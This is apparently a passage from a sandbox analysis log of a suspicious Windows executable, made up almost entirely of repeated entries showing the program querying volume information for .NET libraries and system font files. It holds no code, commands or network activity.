          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
